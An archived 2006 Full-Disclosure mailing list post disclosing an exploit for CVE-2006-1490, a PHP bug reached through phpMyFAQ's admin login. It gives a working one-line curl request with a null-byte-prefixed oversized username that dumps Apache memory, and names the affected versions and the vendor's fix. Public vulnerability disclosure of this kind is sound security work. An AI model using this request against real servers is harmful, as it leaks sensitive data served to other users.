| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 1 Dec 2006 16:57:41 +0200 From: Tonu Samuel <tonu@....ee> To: full-disclosure@...ts.grok.org.uk Subject: phpmyfaq exploit using PHP bug, CVE-2006-1490 Long time ago I made unneccesary noise about PHP zeroday. I expected it to be maybe much more dangerous that it appeared to be at end. There was lot of disscussions and one of main consensus was that this bug is not exploitable in real world because noone is using those vulnerable functions. This bug was originally found using phpmyfaq software and wrong assumption was made about wideness of problem. Anyway now half year later it is time to show exploit: curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" Longer input you provide, longer memory dump you get. Works if PHP is unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of apache memory and often contains sensitive information from other served pages and contexts. To make it clear - this is NOT fault of phpmyfaq people at all. Even more, they made workaround within an hour after I contacted them and urged users to upgrade. Just phpmyfaq appears to be one popular software which is easily findable by Google and this was the software where initially discovery was made. PHP people knew about problem but ignored for long enough to discover it independently from them. Tõnu _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists